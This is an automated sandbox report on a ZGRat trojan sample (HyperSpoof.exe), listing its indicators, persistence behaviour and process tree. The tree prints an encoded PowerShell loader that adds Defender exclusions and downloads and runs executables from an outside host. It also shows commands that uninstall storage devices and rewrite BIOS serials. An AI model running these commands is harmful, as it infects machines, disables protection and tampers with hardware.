zgrat | 71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e

Analysis

max time kernel
12s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
25-04-2024 12:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HyperSpoof.exe
Size

172KB
MD5

ca27199cf4415233d9297b430dcf9924
SHA1

8b21031c8e4a1c5c89c5a70b293cf401b08cb5a4
SHA256

71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e
SHA512

af5c81a1859a3786baff02aac13057f0261ac697209151ce6b8d39f37115d5a6bd471a9cd348d351382c0dd69a828628cf0b38c49f0b9c9ca498e3de539f16ac
SSDEEP

1536:tZkNU8lY/Nz2M0SrbG8XbXUVF5486VQTGRhih2TKbWTwLpVD7ZTcXx:tZ8VA0mG8XbXw56xhi8TKJFA

Score

10^/10

zgrat evasion persistence rat

Malware Config

Signatures

Detect ZGRat V1 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe	family_zgrat_v1
\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe	family_zgrat_v1
\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe	family_zgrat_v1
C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe	family_zgrat_v1
C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe	family_zgrat_v1
behavioral1/memory/1960-147-0x0000000001250000-0x0000000001454000-memory.dmp	family_zgrat_v1

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1584	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1796	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2280	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1556	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2200	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2484	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1752	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2160	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1580	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1400	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1404	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2508	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1912	1476	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	376	1476	schtasks.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Nirsoft 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe	Nirsoft
\ProgramData\Microsoft\Windows\DevManView.exe	Nirsoft

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

5 2876 powershell.exe
7 2876 powershell.exe
9 2876 powershell.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
5	2876	powershell.exe
7	2876	powershell.exe
9	2876	powershell.exe

Executes dropped EXE 14 IoCs

Processes:

HpsrSpoof.exesphyperRuntimedhcpSvc.execonhostsft.exeVolumeid64.exe.conhostsft.exe.sphyperRuntimedhcpSvc.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exe

pid	process
1744	HpsrSpoof.exe
332	sphyperRuntimedhcpSvc.exe
1580	conhostsft.exe
2024	Volumeid64.exe
1144
1976	.conhostsft.exe
1960	.sphyperRuntimedhcpSvc.exe
292	DevManView.exe
1980	DevManView.exe
1428	DevManView.exe
1472	DevManView.exe
2988	DevManView.exe
2248	DevManView.exe
2216	DevManView.exe

Loads dropped DLL 21 IoCs

Processes:

powershell.execmd.execonhostsft.exesphyperRuntimedhcpSvc.execmd.exe

pid	process
2876	powershell.exe
348	cmd.exe
1580	conhostsft.exe
332	sphyperRuntimedhcpSvc.exe
332	sphyperRuntimedhcpSvc.exe
1580	conhostsft.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe
1284	cmd.exe

Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

2660 sc.exe
2144 sc.exe
2716 sc.exe
2344 sc.exe
1452 sc.exe
796 sc.exe
1864 sc.exe
2744 sc.exe
808 sc.exe
1632 sc.exe
3016 sc.exe
812 sc.exe
340 sc.exe
1912 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2660	sc.exe
2144	sc.exe
2716	sc.exe
2344	sc.exe
1452	sc.exe
796	sc.exe
1864	sc.exe
2744	sc.exe
808	sc.exe
1632	sc.exe
3016	sc.exe
812	sc.exe
340	sc.exe
1912	sc.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1752	schtasks.exe
2736	schtasks.exe
1580	schtasks.exe
2508	schtasks.exe
1796	schtasks.exe
2484	schtasks.exe
376	schtasks.exe
1584	schtasks.exe
2280	schtasks.exe
1556	schtasks.exe
1404	schtasks.exe
1400	schtasks.exe
1912	schtasks.exe
2200	schtasks.exe
2160	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2580 PING.EXE

pid	process
2580	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

HyperSpoof.exepowershell.exe.sphyperRuntimedhcpSvc.exe

pid	process
1948	HyperSpoof.exe
1948	HyperSpoof.exe
1948	HyperSpoof.exe
1948	HyperSpoof.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
2876	powershell.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe
1960	.sphyperRuntimedhcpSvc.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

HyperSpoof.exepowershell.exe.sphyperRuntimedhcpSvc.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exe

description	pid	process
Token: SeDebugPrivilege	1948	HyperSpoof.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	1960	.sphyperRuntimedhcpSvc.exe
Token: SeBackupPrivilege	1980	DevManView.exe
Token: SeBackupPrivilege	292	DevManView.exe
Token: SeRestorePrivilege	1980	DevManView.exe
Token: SeTakeOwnershipPrivilege	1980	DevManView.exe
Token: SeRestorePrivilege	292	DevManView.exe
Token: SeTakeOwnershipPrivilege	292	DevManView.exe
Token: SeBackupPrivilege	1428	DevManView.exe
Token: SeRestorePrivilege	1428	DevManView.exe
Token: SeTakeOwnershipPrivilege	1428	DevManView.exe
Token: SeBackupPrivilege	1472	DevManView.exe
Token: SeRestorePrivilege	1472	DevManView.exe
Token: SeTakeOwnershipPrivilege	1472	DevManView.exe
Token: SeBackupPrivilege	2988	DevManView.exe
Token: SeRestorePrivilege	2988	DevManView.exe
Token: SeTakeOwnershipPrivilege	2988	DevManView.exe
Token: SeImpersonatePrivilege	292	DevManView.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

HyperSpoof.exepowershell.exeHpsrSpoof.execmd.execonhostsft.exesphyperRuntimedhcpSvc.execmd.exe

description	pid	process	target process
PID 1948 wrote to memory of 2876	1948	HyperSpoof.exe	powershell.exe
PID 1948 wrote to memory of 2876	1948	HyperSpoof.exe	powershell.exe
PID 1948 wrote to memory of 2876	1948	HyperSpoof.exe	powershell.exe
PID 2876 wrote to memory of 1744	2876	powershell.exe	HpsrSpoof.exe
PID 2876 wrote to memory of 1744	2876	powershell.exe	HpsrSpoof.exe
PID 2876 wrote to memory of 1744	2876	powershell.exe	HpsrSpoof.exe
PID 2876 wrote to memory of 332	2876	powershell.exe	sphyperRuntimedhcpSvc.exe
PID 2876 wrote to memory of 332	2876	powershell.exe	sphyperRuntimedhcpSvc.exe
PID 2876 wrote to memory of 332	2876	powershell.exe	sphyperRuntimedhcpSvc.exe
PID 2876 wrote to memory of 332	2876	powershell.exe	sphyperRuntimedhcpSvc.exe
PID 2876 wrote to memory of 1580	2876	powershell.exe	conhostsft.exe
PID 2876 wrote to memory of 1580	2876	powershell.exe	conhostsft.exe
PID 2876 wrote to memory of 1580	2876	powershell.exe	conhostsft.exe
PID 2876 wrote to memory of 1580	2876	powershell.exe	conhostsft.exe
PID 1744 wrote to memory of 348	1744	HpsrSpoof.exe	cmd.exe
PID 1744 wrote to memory of 348	1744	HpsrSpoof.exe	cmd.exe
PID 1744 wrote to memory of 348	1744	HpsrSpoof.exe	cmd.exe
PID 348 wrote to memory of 2024	348	cmd.exe	Volumeid64.exe
PID 348 wrote to memory of 2024	348	cmd.exe	Volumeid64.exe
PID 348 wrote to memory of 2024	348	cmd.exe	Volumeid64.exe
PID 1580 wrote to memory of 1976	1580	conhostsft.exe	cmd.exe
PID 1580 wrote to memory of 1976	1580	conhostsft.exe	cmd.exe
PID 1580 wrote to memory of 1976	1580	conhostsft.exe	cmd.exe
PID 1580 wrote to memory of 1976	1580	conhostsft.exe	cmd.exe
PID 332 wrote to memory of 1960	332	sphyperRuntimedhcpSvc.exe	Volumeid64.exe
PID 332 wrote to memory of 1960	332	sphyperRuntimedhcpSvc.exe	Volumeid64.exe
PID 332 wrote to memory of 1960	332	sphyperRuntimedhcpSvc.exe	Volumeid64.exe
PID 332 wrote to memory of 1960	332	sphyperRuntimedhcpSvc.exe	Volumeid64.exe
PID 1744 wrote to memory of 1284	1744	HpsrSpoof.exe	Volumeid64.exe
PID 1744 wrote to memory of 1284	1744	HpsrSpoof.exe	Volumeid64.exe
PID 1744 wrote to memory of 1284	1744	HpsrSpoof.exe	Volumeid64.exe
PID 1284 wrote to memory of 276	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 276	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 276	1284	cmd.exe	cmd.exe
PID 1284 wrote to memory of 292	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 292	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 292	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 920	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 920	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 920	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 1980	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 1980	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 1980	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 3020	1284	cmd.exe	System.exe
PID 1284 wrote to memory of 3020	1284	cmd.exe	System.exe
PID 1284 wrote to memory of 3020	1284	cmd.exe	System.exe
PID 1284 wrote to memory of 2216	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 2216	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 2216	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 2220	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 2220	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 2220	1284	cmd.exe	conhost.exe
PID 1284 wrote to memory of 2248	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 2248	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 2248	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 1632	1284	cmd.exe	sc.exe
PID 1284 wrote to memory of 1632	1284	cmd.exe	sc.exe
PID 1284 wrote to memory of 1632	1284	cmd.exe	sc.exe
PID 1284 wrote to memory of 2988	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 2988	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 2988	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 2804	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 2804	1284	cmd.exe	DevManView.exe
PID 1284 wrote to memory of 2804	1284	cmd.exe	DevManView.exe

C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe
"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: K5IP-PGCM
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:348

C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: K5IP-PGCM
5⤵
- Executes dropped EXE
PID:2024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1284

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
5⤵
PID:276

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:292

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
5⤵
PID:920

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
5⤵
PID:3020

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
5⤵
- Executes dropped EXE
PID:2216

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
5⤵
PID:2220

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
5⤵
- Executes dropped EXE
PID:2248

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
5⤵
PID:1632

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
5⤵
PID:2804

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
5⤵
PID:1888

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
5⤵
PID:2288

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
4⤵
PID:2412

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25722HP-TRGT21201AB
5⤵
PID:2416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
4⤵
PID:2628

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 225722HP-TRGT21201RV
5⤵
PID:2436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
4⤵
PID:2404

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 825722HP-TRGT21201SG
5⤵
PID:2452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
4⤵
PID:2464

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
5⤵
PID:1732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
4⤵
PID:2856

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 525726HP-TRGT31950SL
5⤵
PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
4⤵
PID:1972

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 425726HP-TRGT31950FA
5⤵
PID:2868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
4⤵
PID:2432

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 625726HP-TRGT31950FU
5⤵
PID:776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
4⤵
PID:1364

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 325726HP-TRGT31950DQ
5⤵
PID:2124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
4⤵
PID:1276

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 725726HP-TRGT31950MST
5⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
4⤵
PID:852

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
5⤵
PID:2448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
4⤵
PID:356

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 25745HP-TRGT30904AB
5⤵
PID:1256

C:\Windows\System32\cmd.exe
